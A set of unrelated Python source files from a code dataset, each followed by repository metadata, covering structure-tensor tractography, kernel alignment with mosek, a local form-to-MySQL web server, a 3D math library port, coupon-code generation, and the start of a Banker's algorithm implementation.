        # Gradient amplitudes, saved for inspection.
        ga = np.sqrt(gprrrr + gpcccc + gpzzzz)
        gradient_amplitudes_data = nib.Nifti1Image(ga, affine=np.eye(4))
        nib.save(gradient_amplitudes_data, 'gradient_amplitudes.nii')
        # Unit gradient vectors (normalized by amplitude), saved for inspection.
        gv = np.concatenate((grr[..., np.newaxis], gcc[..., np.newaxis], gzz[..., np.newaxis]), axis=3)
        gv = np.divide(gv, np.tile(ga[..., None], [1, 1, 1, 3]))
        gradient_vectors_data = nib.Nifti1Image(gv, affine=np.eye(4))
        nib.save(gradient_vectors_data, 'gradient_vectors.nii')
        # Structure tensor: Gaussian-blur each gradient product and stack the
        # six upper-triangular components in FSL order.
        for kk in range(len(gausigmaArr)):
            gausigma = gausigmaArr[kk]
            print("Start Gauss Sigma with gausigma = " + str(gausigma))
            print("Generating Gaussian kernel...")
            gaussker = np.single(gaussgen([gausigma, gausigma, gausigma]))
            print("Blurring gradient products...")
            gprrrrgauss = signal.convolve(gprrrr, gaussker, "same")
            gprrccgauss = signal.convolve(gprrcc, gaussker, "same")
            gprrzzgauss = signal.convolve(gprrzz, gaussker, "same")
            gpccccgauss = signal.convolve(gpcccc, gaussker, "same")
            gpcczzgauss = signal.convolve(gpcczz, gaussker, "same")
            gpzzzzgauss = signal.convolve(gpzzzz, gaussker, "same")
            print("Saving a copy for this Gaussian sigma...")
            tensorfsl = np.concatenate((gprrrrgauss[..., np.newaxis], gprrccgauss[..., np.newaxis],
                                        gprrzzgauss[..., np.newaxis], gpccccgauss[..., np.newaxis],
                                        gpcczzgauss[..., np.newaxis], gpzzzzgauss[..., np.newaxis]), axis=3)
            tensor_fsl_data = nib.Nifti1Image(tensorfsl, affine=np.eye(4))
            nib.save(tensor_fsl_data, str(filename) + "dogsigma_" + str(jj) + "gausigma_" + str(kk) + 'tensorfsl.nii')
    print('Completed computing structure tensor on ' + str(filename) + '!')
    # Returns the tensor from the final (dogsigma, gausigma) combination.
    return tensorfsl
"repo_name": "alee156/clviz",
"path": "clarityviz/tractography.py",
"copies": "2",
"size": "10679",
"license": "apache-2.0",
"hash": 8551177365187239000,
"line_mean": 34.0163934426,
"line_max": 124,
"alpha_frac": 0.5951868152,
"autogenerated": false,
"ratio": 3.3933905306641248,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4988577345864125,
"avg_score": null,
"num_lines": null
} |
import numpy as np
import mosek
def f_dot(X, Y):
    """Frobenius inner product: sum of the elementwise products of X and Y."""
    products = X * Y
    row_totals = sum(products)
    return sum(row_totals)
def center(km):
    """Double-center kernel matrix km: H @ km @ H with H = I - (1/m) 11^T."""
    m = len(km)
    ones = np.ones((m, 1))
    centering = np.eye(m) - np.dot(ones, ones.T) / m
    return np.dot(centering, km).dot(centering)
def getCKTA(km, ky):
    """Centered kernel-target alignment between kernel km and target ky."""
    normalizer = np.sqrt(f_dot(km, km) * f_dot(ky, ky))
    return f_dot(km, ky) / normalizer
def streamprinter(text):
    """Mosek log-stream callback: write solver output straight to stdout.

    Fix: `sys` is never imported at this module's top level, so the original
    raised NameError on first use; import it locally here.
    """
    import sys
    sys.stdout.write(text)
    sys.stdout.flush()
def ALIGNF(km_list, ky):
    """
    The kernels should be centered before calling.
    Parameters:
    -----------
    km_list, a list of kernel matrices, list of 2d array
    ky, target kernel, 2d array
    Returns:
    --------
    xx, the weight for each kernels
    """
    n_feat = len(km_list)
    #km_list_copy = []
    # center the kernel first
    #for i in range(n_feat):
    #    km_list_copy.append(center(km_list[i].copy()))
    #ky_copy = center(ky.copy())
    # a[i] = <K_i, K_y>: alignment of each candidate kernel with the target.
    a = np.zeros(n_feat)
    for i in range(n_feat):
        a[i] = f_dot(km_list[i], ky)
    # M[i, j] = <K_i, K_j>: symmetric Gram matrix of the candidate kernels.
    M = np.zeros((n_feat, n_feat))
    for i in range(n_feat):
        for j in range(i, n_feat):
            M[i, j] = f_dot(km_list[i], km_list[j])
            M[j, i] = M[i, j]
    # QP: minimize 0.5 x'Qx + C'x with Q = 2M and C = -2a, i.e. x'Mx - 2a'x.
    Q = 2 * M
    C = -2 * a
    # Tiny ridge on the diagonal keeps Q numerically positive definite.
    Q = Q + np.diag(np.ones(n_feat) * 1e-8)
    ################################################
    # Using mosek to solve the quadratice programming
    # Set upper diagonal element to zeros, mosek only accept lower triangle
    iu = np.triu_indices(n_feat, 1)
    Q[iu] = 0
    # start solving with mosek
    inf = 0.0  # mosek ignores the numeric value of bounds marked infinite
    env = mosek.Env()
    env.set_Stream(mosek.streamtype.log, streamprinter)
    # Create a task
    task = env.Task()
    task.set_Stream(mosek.streamtype.log, streamprinter)
    # Set up bound for variables: weights constrained to x >= 0.
    bkx = [mosek.boundkey.lo] * n_feat
    blx = [0.0] * n_feat
    #bkx = [mosek.boundkey.fr]* n_feat
    #blx = [-inf] * n_feat
    bux = [+inf] * n_feat
    numvar = len(bkx)
    task.appendvars(numvar)
    for j in range(numvar):
        task.putcj(j, C[j])
        task.putvarbound(j, bkx[j], blx[j], bux[j])
    # Set up quadratic objective from the nonzero (lower-triangular) entries of Q.
    inds = np.nonzero(Q)
    qsubi = inds[0].tolist()
    qsubj = inds[1].tolist()
    qval = Q[inds].tolist()
    # Input quadratic objective
    task.putqobj(qsubi, qsubj, qval)
    # Input objective sense (minimize/mximize)
    task.putobjsense(mosek.objsense.minimize)
    task.optimize()
    # Print a summary containing information
    # about the solution for debugging purposes
    task.solutionsummary(mosek.streamtype.msg)
    solsta = task.getsolsta(mosek.soltype.itr)
    if (solsta == mosek.solsta.optimal or
            solsta == mosek.solsta.near_optimal):
        # Output a solution
        xx = np.zeros(numvar, float)
        task.getxx(mosek.soltype.itr, xx)
        #xx = xx/np.linalg.norm(xx)
        return xx
    else:
        # Non-optimal status: report it, then return the solver's best iterate anyway.
        print solsta
        xx = np.zeros(numvar, float)
        task.getxx(mosek.soltype.itr, xx)
        #xx = xx/np.linalg.norm(xx)
        return xx
# test
#km_list = []
#for i in range(5):
# A = np.random.rand(5,5)
# km_list.append(np.dot(A.T,A))
#B = np.random.rand(5,5)
#ky = np.dot(B.T,B)
#w = ALIGNF(km_list, ky)
#print w
| {
"repo_name": "aalto-ics-kepaco/softALIGNF",
"path": "ovkr_code/alignf.py",
"copies": "2",
"size": "3503",
"license": "apache-2.0",
"hash": 2443401653867814000,
"line_mean": 24.384057971,
"line_max": 75,
"alpha_frac": 0.5286896945,
"autogenerated": false,
"ratio": 2.963620981387479,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4492310675887479,
"avg_score": null,
"num_lines": null
} |
# a python implementation of a local web server which
# ... recognizes web form data from post requests
# ... and stores web form data in a mysql database.
# to run from root dir: `python software/start_local_web_server.py`
# source(s):
# + http://georgik.sinusgear.com/2011/01/07/how-to-dump-post-request-with-python/
# + https://snipt.net/raw/f8ef141069c3e7ac7e0134c6b58c25bf/?nice
# + https://github.com/PyMySQL/PyMySQL#example
# + http://www.cs.sfu.ca/CourseCentral/165/common/guide/html/sec-cgi.html
# + https://wiki.python.org/moin/BaseHttpServer
import code # to debug: `code.interact(local=locals())`
import logging # to log: `logging.warning("MY MESSAGE")` or `logging.error("MY MESSAGE")`
import SimpleHTTPServer
import SocketServer
import cgi
import json
import pymysql.cursors
import os
from bs4 import BeautifulSoup
PORT = 8818  # local port the demo web server listens on
try:
    # if your root user has a password, assign it to the "MYSQL_ROOT_PASSWORD" environment variable
    DB_ROOT_PASSWORD = os.environ["MYSQL_ROOT_PASSWORD"]
except KeyError as e:
    DB_ROOT_PASSWORD = "" # most students' root user doesn't have a password
#
# DEFINE THE LOCAL WEB SERVER
#
class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """Request handler that serves static files, renders the menu index page
    from MySQL on GET, and inserts posted menu items into MySQL on POST."""
    #
    # OVERWRITE BEHAVIOR OF "GET" REQUESTS
    #
    def do_GET(self):
        """Serve files normally, except /menu-items/index.html, which is built
        by injecting menu_items rows from the database into the page's table."""
        if ".html" in self.path: # only log messages for html pages, not images and scripts
            self.log_message("GETTING: " + self.path)
            self.log_message("HEADERS: " + json.dumps(dict(self.headers)))
        # IF GETTING THE MENU PATH, READ MENU ITEMS FROM DATABASE
        if self.path == "/menu-items/index.html":
            self.log_message("QUERYING THE DATABASE")
            menu_items = []
            # ESTABLISH DATABASE CONNECTION
            connection = pymysql.connect(
                host='localhost',
                port=3306,
                user='root',
                passwd= DB_ROOT_PASSWORD,
                db='salad_db',
                #charset='utf8mb4',
                cursorclass=pymysql.cursors.DictCursor  # rows come back as dicts
            )
            # EXECUTE DATABASE TRANSACTION
            try:
                # GET MENU ITEM RECORDS
                with connection.cursor() as cursor:
                    sql = "SELECT * FROM menu_items ORDER BY id DESC LIMIT 100"
                    cursor.execute(sql)
                    for row in cursor.fetchall():
                        print(row)
                        menu_items.append(row)
            finally:
                connection.close() # for performance
            # READ HTML FILE
            # NOTE(review): derives the page path by stripping this script's
            # relative path from its absolute path -- confirm this works when
            # the server is started from a different working directory.
            menu_dot_html = os.path.abspath(__file__).replace(os.path.relpath(__file__), "menu-items/index.html")
            print "READING HTML FILE -- %s" % menu_dot_html
            html_content = BeautifulSoup(open(menu_dot_html),"lxml")
            # MANIPULATE FILE CONTENTS
            ###menu_item_list = html_content.find(id="menu-item-list")
            ###print menu_item_list
            ###for menu_item in menu_items:
            ###    list_item = html_content.new_tag('li')
            ###    list_item.string = menu_item["title"]
            ###    menu_item_list.append(list_item)
            # Append one <tr> per menu item into the #menu-item-table-body element.
            menu_item_table_body = html_content.find(id="menu-item-table-body")
            for menu_item in menu_items:
                table_row = html_content.new_tag('tr')
                for attr_val in [
                    menu_item["id"],
                    menu_item["category"],
                    menu_item["title"],
                    menu_item["vegan_safe"],
                    menu_item["gluten_free"],
                    menu_item["description"]
                ]:
                    table_data = html_content.new_tag('td')
                    table_data.string = str(attr_val)
                    table_row.append(table_data)
                menu_item_table_body.append(table_row)
            # RETURN HTML CONTENT
            self.send_response(200)
            self.send_header("Content-type", "text/html")
            self.end_headers()
            self.wfile.write(html_content)
        else:
            SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
    #
    # OVERWRITE BEHAVIOR OF "POST" REQUESTS
    #
    def do_POST(self):
        """Parse posted form data; for /menu-items/new.html insert a new
        menu_items row, then redirect the client to the menu index page."""
        self.log_message("POSTING: " + self.path)
        self.log_message("HEADERS: " + json.dumps(dict(self.headers)))
        # READ FORM DATA
        form = cgi.FieldStorage(
            fp=self.rfile,
            headers=self.headers,
            environ={
                'REQUEST_METHOD': 'POST',
                'CONTENT_TYPE': self.headers['Content-Type'],
            }
        )
        # LOG FORM DATA
        form_dict = {}
        for attribute in form.list:
            form_dict[attribute.name] = attribute.value
        self.log_message("POSTED DATA: " + json.dumps(form_dict))
        # IF POSTING TO THE NEW MENU ITEMS PATH, CREATE A NEW MENU ITEM RECORD IN THE DATABASE
        if self.path == "/menu-items/new.html":
            self.log_message("STORING: " + json.dumps(form_dict))
            # TRANSFORM DATA
            category = form['category'].value
            title = form['title'].value
            calories = form['calories'].value
            description = form['description'].value
            # Unchecked checkboxes are absent from the form, raising KeyError.
            try:
                gluten_free = True if form['gluten_free'] else False
            except KeyError as e:
                gluten_free = False
            try:
                vegan_safe = True if form['vegan_safe'] else False
            except KeyError as e:
                vegan_safe = False
            # Coerce to ints for the INSERT (MySQL stores booleans as 0/1).
            calories = int(calories)
            gluten_free = int(gluten_free)
            vegan_safe = int(vegan_safe)
            # ESTABLISH DATABASE CONNECTION
            connection = pymysql.connect(
                host='localhost',
                port=3306,
                user='root',
                passwd= DB_ROOT_PASSWORD,
                db='salad_db',
                #charset='utf8mb4',
                cursorclass=pymysql.cursors.DictCursor
            )
            # EXECUTE DATABASE TRANSACTION
            try:
                # CREATE NEW RECORD (parameterized query; pymysql escapes the values)
                with connection.cursor() as cursor:
                    sql = "INSERT INTO `menu_items` (`category`,`title`,`calories`,`gluten_free`,`vegan_safe`,`description`) VALUES (%s, %s, %s, %s, %s, %s)"
                    cursor.execute(sql, (category, title, calories, gluten_free, vegan_safe, description) )
                    connection.commit() # to save the changes
                # PRINT NEW RECORD
                with connection.cursor() as cursor:
                    sql = "SELECT * FROM menu_items ORDER BY id DESC LIMIT 1"
                    cursor.execute(sql)
                    result = cursor.fetchone()
                    print(result)
            finally:
                connection.close() # for performance
            self.log_message("STORED")
        # REDIRECT TO MENU INDEX
        self.log_message("REDIRECTING")
        self.send_response(301)
        self.send_header('Location',"/menu-items/index.html")
        self.end_headers()
        SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
#
# RUN THE LOCAL WEB SERVER
#
Handler = ServerHandler
# bind to all interfaces on PORT and block forever handling requests
httpd = SocketServer.TCPServer(("", PORT), Handler)
print "SERVING AT PORT:", PORT
httpd.serve_forever()
| {
"repo_name": "gwu-business/salad-system-py",
"path": "software/start_local_web_server.py",
"copies": "1",
"size": "7395",
"license": "mit",
"hash": -5664936498330844000,
"line_mean": 31.4342105263,
"line_max": 157,
"alpha_frac": 0.5509127789,
"autogenerated": false,
"ratio": 4.001623376623376,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0023253454152183843,
"num_lines": 228
} |
# a python implementation of math3d.h & math3d.cpp from the OpenGL SuperBible
# Ben Smith
# benjamin.coder.smith@gmail.com
#
# Math3d.h
# Header file for the Math3d library. The C-Runtime has math.h, this file and the
# accompanying math.c are meant to suppliment math.h by adding geometry/math routines
# useful for graphics, simulation, and physics applications (3D stuff).
# Richard S. Wright Jr.
from pyglet.gl import *
from math import sin, cos
M3D_PI = 3.14159265358979323846
M3D_PI_DIV_180 = M3D_PI / 180.0           # degrees -> radians factor
M3D_INV_PI_DIV_180 = 57.2957795130823229  # radians -> degrees factor

# ctypes float-array aliases matching the C typedefs in math3d.h.
M3DVector2f = GLfloat * 2
M3DVector3f = GLfloat * 3  # Vector of three floats (x, y, z)
M3DVector4f = GLfloat * 4
M3DMatrix44f = GLfloat * 16  # A 4 X 4 matrix, column major (floats) - OpenGL style
def m3dTransformVector3(vOut, v, m):
    """Transform 3-vector v by column-major 4x4 matrix m (implicit w = 1),
    writing the result into vOut."""
    x, y, z = v[0], v[1], v[2]
    vOut[0] = m[0] * x + m[4] * y + m[8] * z + m[12]
    vOut[1] = m[1] * x + m[5] * y + m[9] * z + m[13]
    vOut[2] = m[2] * x + m[6] * y + m[10] * z + m[14]
def m3dLoadIdentity44(m):
    """Overwrite 4x4 column-major matrix m with the identity matrix."""
    for idx in range(16):
        # Diagonal entries of a flattened 4x4 sit at indices 0, 5, 10, 15.
        m[idx] = 1.0 if idx % 5 == 0 else 0.0
# Translate matrix. Only 4x4 matrices supported
def m3dTranslateMatrix44(m, x, y, z):
    """Add (x, y, z) to the translation column of column-major matrix m."""
    for offset, delta in zip((12, 13, 14), (x, y, z)):
        m[offset] += delta
# Scale matrix. Only 4x4 matrices supported
def m3dScaleMatrix44(m, x, y, z):
    """Multiply the diagonal scale entries of column-major matrix m by x, y, z."""
    for offset, factor in zip((0, 5, 10), (x, y, z)):
        m[offset] *= factor
# Creates a 4x4 rotation matrix, takes radians NOT degrees
def m3dRotationMatrix44(m, angle, x, y, z):
    """Fill m with a column-major 4x4 rotation of `angle` radians about axis
    (x, y, z); the axis is normalized here, and a zero axis yields identity.

    Fix: the degenerate-axis branch called the undefined name
    m3dLoadIdentity (NameError); it now calls m3dLoadIdentity44.
    """
    s = sin(angle)
    c = cos(angle)
    mag = float((x * x + y * y + z * z) ** 0.5)
    if mag == 0.0:
        m3dLoadIdentity44(m)
        return
    # Normalize the rotation axis.
    x /= mag
    y /= mag
    z /= mag
    xx = x * x
    yy = y * y
    zz = z * z
    xy = x * y
    yz = y * z
    zx = z * x
    xs = x * s
    ys = y * s
    zs = z * s
    one_c = 1.0 - c
    # Rodrigues' rotation formula, laid out column-major.
    m[0] = (one_c * xx) + c
    m[1] = (one_c * xy) - zs
    m[2] = (one_c * zx) + ys
    m[3] = 0.0
    m[4] = (one_c * xy) + zs
    m[5] = (one_c * yy) + c
    m[6] = (one_c * yz) - xs
    m[7] = 0.0
    m[8] = (one_c * zx) - ys
    m[9] = (one_c * yz) + xs
    m[10] = (one_c * zz) + c
    m[11] = 0.0
    m[12] = 0.0
    m[13] = 0.0
    m[14] = 0.0
    m[15] = 1.0
# Multiply two 4x4 matricies
def m3dMatrixMultiply44(product, a, b):
    """Write a * b into `product` (column-major 4x4 matrices; `product`
    must not alias a or b)."""
    for row in range(4):
        a0, a1, a2, a3 = a[row], a[row + 4], a[row + 8], a[row + 12]
        for col in range(4):
            base = col * 4
            product[row + base] = (a0 * b[base] + a1 * b[base + 1] +
                                   a2 * b[base + 2] + a3 * b[base + 3])
# Transpose/Invert - Only 4x4 matricies supported
def m3dTransposeMatrix44(dst, src):
    """Write the transpose of 4x4 matrix src into dst."""
    for idx in range(16):
        row, col = idx // 4, idx % 4
        dst[idx] = src[col * 4 + row]
def m3dDegToRad(num):
    """Convert an angle in degrees to radians."""
    return num * M3D_PI_DIV_180
def m3dRadToDeg(num):
    """Convert an angle in radians to degrees."""
    return num * M3D_INV_PI_DIV_180
###########################################################
# Cross Product
# u x v = result
# We only need one version for floats, and one version for doubles. A 3 component
# vector fits in a 4 component vector. If M3DVector4d or M3DVector4f are passed
# we will be OK because 4th component is not used.
def m3dCrossProduct(u, v):
    """Return the cross product u x v as a new M3DVector3f."""
    cx = u[1] * v[2] - u[2] * v[1]
    cy = u[2] * v[0] - u[0] * v[2]
    cz = u[0] * v[1] - u[1] * v[0]
    result = M3DVector3f()
    result[0], result[1], result[2] = cx, cy, cz
    return result
# Calculates the normal of a triangle specified by the three points
# p1, p2, and p3. Each pointer points to an array of three floats. The
# triangle is assumed to be wound counter clockwise.
def m3dFindNormal(point1, point2, point3):
    """Return the (unnormalized) normal of the triangle (point1, point2,
    point3), assuming counter-clockwise winding."""
    edge1 = M3DVector3f()
    edge2 = M3DVector3f()
    # Two edge vectors sharing point2; CCW winding assumed.
    for axis in range(3):
        edge1[axis] = point1[axis] - point2[axis]
        edge2[axis] = point2[axis] - point3[axis]
    return m3dCrossProduct(edge1, edge2)
def m3dSetMatrixColumn44(dst, src, col):
    """Copy the first three components of src into column `col` of 4x4
    column-major matrix dst; the w component is deliberately left untouched."""
    base = col * 4
    for offset in range(3):
        dst[base + offset] = src[offset]
# Get Square of a vectors length
# Only for three component vectors
def m3dGetVectorLengthSquared(u):
    """Squared Euclidean length of three-component vector u."""
    return u[0] ** 2 + u[1] ** 2 + u[2] ** 2
def m3dScaleVector3(v, scale):
    """Multiply each of the three components of v by scale, in place."""
    for axis in range(3):
        v[axis] *= scale
# Get length of vector
# Only for three component vectors.
def m3dGetVectorLength(u):
    """Euclidean length of three-component vector u."""
    return m3dGetVectorLengthSquared(u) ** 0.5
# Normalize a vector
# Scale a vector to unit length. Easy, just scale the vector by it's length
def m3dNormalizeVector(u):
    """Scale u in place to unit length (u must be nonzero)."""
    m3dScaleVector3(u, 1.0 / m3dGetVectorLength(u))
# Graceless, but duplicating the one from OpenGL SuperBible would be worse, I think?
# Adds a dependency on numpy, also, which is a bummer.
def m3dInvertMatrix44(dst, src):
    """Invert 4x4 matrix src into dst by delegating to numpy.

    Fix: the "You need Numpy." message used a Python-2-only print statement,
    a SyntaxError under Python 3; print() works under both.
    Exits the process with status 1 if numpy is unavailable.
    """
    try:
        from numpy import matrix
    except ImportError:
        print("You need Numpy.")
        import sys
        sys.exit(1)
    mat = matrix([[src[0], src[1], src[2], src[3]],
                  [src[4], src[5], src[6], src[7]],
                  [src[8], src[9], src[10], src[11]],
                  [src[12], src[13], src[14], src[15]]])
    inverted = mat.I.tolist()
    # Copy the inverse back into the caller's flat 16-element destination.
    for row in range(4):
        for col in range(4):
            dst[row * 4 + col] = inverted[row][col]
# Dot Product, only for three component vectors
# return u dot v
def m3dDotProduct(u, v):
    """Dot product of three-component vectors u and v."""
    return sum(u[axis] * v[axis] for axis in range(3))
# Get plane equation from three points and a normal
# Calculate the plane equation of the plane that the three specified points lay in. The
# points are given in clockwise winding order, with normal pointing out of clockwise face
# planeEq contains the A,B,C, and D of the plane equation coefficients
def m3dGetPlaneEquation(p1, p2, p3):
    """Return (A, B, C, D) plane coefficients for the plane through p1, p2, p3
    (clockwise winding; the unit normal points out of the clockwise face)."""
    v1 = M3DVector3f()
    v2 = M3DVector3f()
    # V1 = p3 - p1, V2 = p2 - p1
    for axis in range(3):
        v1[axis] = p3[axis] - p1[axis]
        v2[axis] = p2[axis] - p1[axis]
    # Unit normal to the plane.
    normal = m3dCrossProduct(v1, v2)
    m3dNormalizeVector(normal)
    planeEq = M3DVector4f()
    planeEq[0] = normal[0]
    planeEq[1] = normal[1]
    planeEq[2] = normal[2]
    # Back substitute p3 to get D.
    planeEq[3] = -(planeEq[0] * p3[0] + planeEq[1] * p3[1] + planeEq[2] * p3[2])
    return planeEq
# Planar shadow Matrix
# Creae a projection to "squish" an object into the plane.
# Use m3dGetPlaneEquationf( point1, point2, point3)
# to get a plane equation.
def m3dMakePlanarShadowMatrix(planeEq, vLightPos):
    """Return a column-major 4x4 projection matrix that flattens geometry onto
    the plane described by planeEq, as lit from vLightPos."""
    # Unpack the plane coefficients and the negated light direction.
    a, b, c, d = planeEq[0], planeEq[1], planeEq[2], planeEq[3]
    dx, dy, dz = -vLightPos[0], -vLightPos[1], -vLightPos[2]
    proj = M3DMatrix44f()
    # Now build the projection matrix, column by column.
    proj[0] = b * dy + c * dz
    proj[1] = -a * dy
    proj[2] = -a * dz
    proj[3] = 0.0
    proj[4] = -b * dx
    proj[5] = a * dx + c * dz
    proj[6] = -b * dz
    proj[7] = 0.0
    proj[8] = -c * dx
    proj[9] = -c * dy
    proj[10] = a * dx + b * dy
    proj[11] = 0.0
    proj[12] = -d * dx
    proj[13] = -d * dy
    proj[14] = -d * dz
    proj[15] = a * dx + b * dy + c * dz
    # Shadow matrix ready
    return proj
| {
"repo_name": "fos/fos-legacy",
"path": "scratch/trycubes/math3d.py",
"copies": "1",
"size": "8209",
"license": "bsd-3-clause",
"hash": -1854048983960857600,
"line_mean": 27.2130584192,
"line_max": 125,
"alpha_frac": 0.5396516019,
"autogenerated": false,
"ratio": 2.489084293511219,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3528735895411219,
"avg_score": null,
"num_lines": null
} |
""" A Python implementation of the Algorithm::CouponCode algorithm.
See:
1. http://search.cpan.org/dist/Algorithm-CouponCode/lib/Algorithm/CouponCode.pm
2. https://github.com/chilts/node-coupon-code/blob/master/coupon-code.js
Author: Brett Patterson <bmp2@rice.edu>
"""
import codecs
import random
# ROT13-obfuscated profanity list, decoded at import time. Materialized as a
# list (not a `map` object): under Python 3, `map` returns a one-shot iterator
# that is exhausted after the first full scan, which would make every later
# has_bad_word() call silently return False.
BAD_WORDS = [codecs.decode(w, 'rot13') for w in [
    'SHPX', 'PHAG', 'JNAX', 'JNAT', 'CVFF', 'PBPX', 'FUVG', 'GJNG', 'GVGF',
    'SNEG', 'URYY', 'ZHSS', 'QVPX', 'XABO', 'NEFR', 'FUNT', 'GBFF', 'FYHG',
    'GHEQ', 'FYNT', 'PENC', 'CBBC', 'OHGG', 'SRPX', 'OBBO', 'WVFZ', 'WVMM',
    'CUNG'
]]
# 32-symbol alphabet: digits and uppercase letters, minus the easily-confused
# I, O, S and Z (those are normalized to 1, 0, 5 and 2 in cc_validate).
SYMBOLS = list('0123456789ABCDEFGHJKLMNPQRTUVWXY')
# Reverse lookup: symbol -> index, used by check_digit.
SYMBOLS_MAP = {s: i for i, s in enumerate(SYMBOLS)}
# Separator between code parts, e.g. "1K7Q-CTFM-LZWY".
PART_SEP = '-'
# Normalization rules applied during validation, in order.
# NOTE(review): the first entry is written as a regex, but cc_validate applies
# these with str.replace (literal matching), so it never fires -- re.sub
# appears to have been intended.
REPLACEMENTS = [
    (r'[^0-9A-Z]+', ''),
    (r'O', '0'),
    (r'I', '1'),
    (r'Z', '2'),
    (r'S', '5')
]
def has_bad_word(code):
    """Return True if any known bad word appears as a substring of code."""
    return any(bad in code for bad in BAD_WORDS)
def check_digit(data, n):
    """Return the check symbol for code part `data`, seeded with the 1-based
    part number n (so identical data in different parts checks differently)."""
    accumulator = n
    for symbol in data:
        accumulator = accumulator * 19 + SYMBOLS_MAP[symbol]
    return SYMBOLS[accumulator % (len(SYMBOLS) - 1)]
def cc_generate(plaintext=None, n_parts=3, part_len=4):
    """ Generate a coupon code.

    Fix: when a generated code contained a bad word, the original looped again
    WITHOUT clearing `parts`, so the retry appended extra parts and returned a
    code with more than n_parts segments. `parts` is now reset each attempt.

    Parameters:
    -----------
    plaintext : str
        A plaintext to generate the code from (not yet implemented).
    n_parts : int
        The number of parts for the code.
    part_len : int
        The number of symbols in each part.

    Returns:
    --------
    A coupon code string of n_parts parts joined by PART_SEP.
    """
    if plaintext is not None:
        raise NotImplementedError(
            'Generating a code from plaintext is not yet implemented'
        )
    parts = []
    while len(parts) == 0 or has_bad_word(''.join(parts)):
        parts = []  # discard any previous (bad-word) attempt entirely
        for i in range(n_parts):
            part = ''
            for _ in range(part_len - 1):
                part += random.choice(SYMBOLS)
            # Last symbol of each part is its check digit.
            part += check_digit(part, i + 1)
            parts.append(part)
    return PART_SEP.join(parts)
def cc_validate(code, n_parts=3, part_len=4):
    """ Validate a given code.

    Fixes: the original applied the REPLACEMENTS rules with str.replace, so
    the leading `[^0-9A-Z]+` cleanup regex was matched literally and never
    fired -- codes typed with spaces (e.g. "1K7Q - CTFM - LZWY") were
    rejected. The cleanup is now applied with re.sub and, as in the reference
    Perl/JS implementations, the cleaned symbols are regrouped into
    fixed-length parts so user-supplied separators/spacing don't matter.

    Parameters:
    -----------
    code : str
        The code to validate.
    n_parts : int
        The number of parts for the code.
    part_len : int
        The number of symbols in each part.

    Returns:
    --------
    The cleaned, canonical code ("XXXX-XXXX-XXXX") if valid, otherwise ''.
    """
    import re  # local import: 're' is not imported at this module's top level

    # Normalize: uppercase, strip separators/whitespace/invalid characters,
    # then undo the common misreadings (O->0, I->1, Z->2, S->5).
    code = code.upper()
    code = re.sub(REPLACEMENTS[0][0], REPLACEMENTS[0][1], code)
    for pattern, replacement in REPLACEMENTS[1:]:
        code = code.replace(pattern, replacement)

    # Regroup the flattened symbol string into fixed-length parts.
    if len(code) != n_parts * part_len:
        return ''
    parts = [code[i * part_len:(i + 1) * part_len] for i in range(n_parts)]
    for i, part in enumerate(parts):
        data = part[:-1]
        check = part[-1]
        if check != check_digit(data, i + 1):
            return ''
    return PART_SEP.join(parts)
| {
"repo_name": "brett-patterson/coupon_codes",
"path": "coupon_codes/coupon_codes.py",
"copies": "1",
"size": "2841",
"license": "mit",
"hash": 5468226218571048000,
"line_mean": 22.0975609756,
"line_max": 79,
"alpha_frac": 0.5586061246,
"autogenerated": false,
"ratio": 3.246857142857143,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9305463267457144,
"avg_score": 0,
"num_lines": 123
} |
"""
The Banker's algorithm is a resource allocation and deadlock avoidance algorithm
developed by Edsger Dijkstra that tests for safety by simulating the allocation of
predetermined maximum possible amounts of all resources, and then makes a "s-state"
check to test for possible deadlock conditions for all other pending activities,
before deciding whether allocation should be allowed to continue.
[Source] Wikipedia
[Credit] Rosetta Code C implementation helped very much.
(https://rosettacode.org/wiki/Banker%27s_algorithm)
"""
from __future__ import annotations
import time
import numpy as np
# Shared fixture data for the doctests below: 4 resource types, 5 processes.
test_claim_vector = [8, 5, 9, 7]
# Resources each process currently holds (one row per process).
test_allocated_res_table = [
    [2, 0, 1, 1],
    [0, 1, 2, 1],
    [4, 0, 0, 3],
    [0, 2, 1, 0],
    [1, 0, 3, 0],
]
# Maximum resources each process may ever request.
test_maximum_claim_table = [
    [3, 2, 1, 4],
    [0, 2, 5, 2],
    [5, 1, 0, 5],
    [1, 5, 3, 0],
    [3, 0, 3, 3],
]
class BankersAlgorithm:
    def __init__(
        self,
        claim_vector: list[int],
        allocated_resources_table: list[list[int]],
        maximum_claim_table: list[list[int]],
    ) -> None:
        """
        :param claim_vector: A nxn/nxm list depicting the amount of each resources
         (eg. memory, interface, semaphores, etc.) available.
        :param allocated_resources_table: A nxn/nxm list depicting the amount of each
         resource each process is currently holding
        :param maximum_claim_table: A nxn/nxm list depicting how much of each resource
         the system currently has available
        """
        # Stored as private (name-mangled) attributes; the algorithm below
        # treats them as read-only.
        self.__claim_vector = claim_vector
        self.__allocated_resources_table = allocated_resources_table
        self.__maximum_claim_table = maximum_claim_table
def __processes_resource_summation(self) -> list[int]:
"""
Check for allocated resources in line with each resource in the claim vector
"""
return [
sum(p_item[i] for p_item in self.__allocated_resources_table)
for i in range(len(self.__allocated_resources_table[0]))
]
def __available_resources(self) -> list[int]:
"""
Check for available resources in line with each resource in the claim vector
"""
return np.array(self.__claim_vector) - np.array(
self.__processes_resource_summation()
)
def __need(self) -> list[list[int]]:
"""
Implement safety checker that calculates the needs by ensuring that
max_claim[i][j] - alloc_table[i][j] <= avail[j]
"""
return [
list(np.array(self.__maximum_claim_table[i]) - np.array(allocated_resource))
for i, allocated_resource in enumerate(self.__allocated_resources_table)
]
def __need_index_manager(self) -> dict[int, list[int]]:
"""
This function builds an index control dictionary to track original ids/indices
of processes when altered during execution of method "main"
Return: {0: [a: int, b: int], 1: [c: int, d: int]}
>>> (BankersAlgorithm(test_claim_vector, test_allocated_res_table,
... test_maximum_claim_table)._BankersAlgorithm__need_index_manager()
... ) # doctest: +NORMALIZE_WHITESPACE
